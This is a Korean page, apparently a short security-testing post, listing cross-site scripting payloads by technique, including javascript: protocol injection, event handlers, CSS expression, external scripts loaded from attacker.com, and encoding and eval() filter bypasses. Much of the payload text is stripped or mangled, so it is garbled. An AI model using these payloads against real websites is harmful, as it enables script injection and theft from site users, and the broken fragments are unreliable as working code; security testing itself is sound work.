상단메뉴 바로가기 본문 바로가기 본문 하위메뉴 바로가기 하단 바로가기

보안 취약점 체크

김상민   /   2021-07-07

연락처010-0000-0000이메일ksm5105@naver.com

기본적인 XSS

xss 테스트 [removed] alert("xss"); [removed]

경로에 [removed] 프로토콜을 삽입한 XSS

<'><>사용자가 마우스를 대도록 크기를 조정하고><>< >>" onmouseenter="alert('XSS');this.outerHTML='';">

애플릿 경로에 [removed] 프로토콜을 삽입한 XSS

테이블 배경 그림에 [removed] 프로토콜을 삽입한 XSS

CSS의 expression 스크립트 확장 기능을 이용한 XSS

마퀴 태그의 onstart 이벤트를 이용한 XSS

XSS

외부파일을 이용한 XSS

[removed]http://attacker.com/xss.js">[removed]

[removed]http://attacker.com/xss.css">[removed]

HTML 인코딩을 이용하여 필터링을 우회하는 XSS

("XSS");" width=0 height=0>

HTML 인코딩을 이용하여 필터링을 우회하는 XSS

"XSS");" width=0 height=0>

alert 키워드를 필터링하는 사이트의 경우 eval() 함수를 응용하여 우회가능

<>